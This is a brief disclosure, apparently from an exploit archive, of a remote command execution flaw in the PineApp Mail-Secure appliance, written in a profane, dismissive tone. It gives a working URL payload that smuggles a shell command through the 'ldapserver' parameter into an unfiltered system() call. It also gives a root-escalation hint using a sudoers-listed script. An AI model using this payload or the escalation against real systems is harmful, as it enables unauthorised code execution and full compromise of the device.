PineApp Mail-Secure suffers from a remote command execution vulnerability.
c8924470a66b81659abf009075c3c7120c0413e9a832af8c6b0561ef68313cee
pineapp makes an anti-spam product, which can be downloaded for vmware, etc.
the security of the product is a fucking joke, containing everything from authentication bypass to root exploits. there is really no hope, the developers didnt even try. they can patch those specific vulnerabilities, but have no idea what theyre doing. i only scratched its surface.
unfiltered system() in
http://192.168.9.2/aliases-x.php?getLdapDC=wtf&ldapserver=;id>/tmp/wtf;
escalate to root by creating for example /usr/local/bin/cfma-mirror.sh (in sudoers)